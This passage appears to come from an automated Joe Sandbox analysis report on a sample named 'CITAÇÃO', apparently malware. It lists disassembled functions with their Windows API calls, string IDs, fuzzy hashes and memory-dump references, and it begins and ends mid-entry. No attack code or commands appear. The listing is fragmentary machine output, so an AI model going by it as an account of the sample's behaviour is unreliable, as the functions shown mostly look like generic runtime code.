                                                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                      Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 00445BF8
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                      • __wcsicoll.LIBCMT ref: 00445C33
                                                      • __wcsicoll.LIBCMT ref: 00445C4F
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll$ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 3125838495-3381328864
                                                      • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                      • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                      • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                      • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                      Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                      Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                      • _wcscpy.LIBCMT ref: 004787E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 3052893215-2127371420
                                                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                      Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                      • __swprintf.LIBCMT ref: 0045E7F7
                                                      • _wprintf.LIBCMT ref: 0045E8B3
                                                      • _wprintf.LIBCMT ref: 0045E8D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2295938435-2354261254
                                                      • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                      • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                      Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 3038501623-2263619337
                                                      • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                      • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                      Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                      • __swprintf.LIBCMT ref: 0045E5F6
                                                      • _wprintf.LIBCMT ref: 0045E6A3
                                                      • _wprintf.LIBCMT ref: 0045E6C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2295938435-8599901
                                                      • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                      • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                      Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00443B67
                                                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                      • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                      • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                      • IsWindow.USER32(00000000), ref: 00443C3A
                                                      • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1834419854-3405671355
                                                      • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                      • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                      • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                      • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                      Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                      • LoadStringW.USER32(00000000), ref: 00454040
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • _wprintf.LIBCMT ref: 00454074
                                                      • __swprintf.LIBCMT ref: 004540A3
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 455036304-4153970271
                                                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                      Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                      • _memmove.LIBCMT ref: 00467EB8
                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                      • _memmove.LIBCMT ref: 00467F6C
                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                      • String ID:
                                                      • API String ID: 2170234536-0
                                                      • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                      • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                      Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00453CE0
                                                      • SetKeyboardState.USER32(?), ref: 00453D3B
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                      • GetKeyState.USER32(000000A0), ref: 00453D75
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                      • GetKeyState.USER32(00000011), ref: 00453DEF
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                      • GetKeyState.USER32(00000012), ref: 00453E26
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                      Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                      Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                      • DeleteObject.GDI32(?), ref: 0047151E
                                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                      • DeleteObject.GDI32(?), ref: 004715EA
                                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
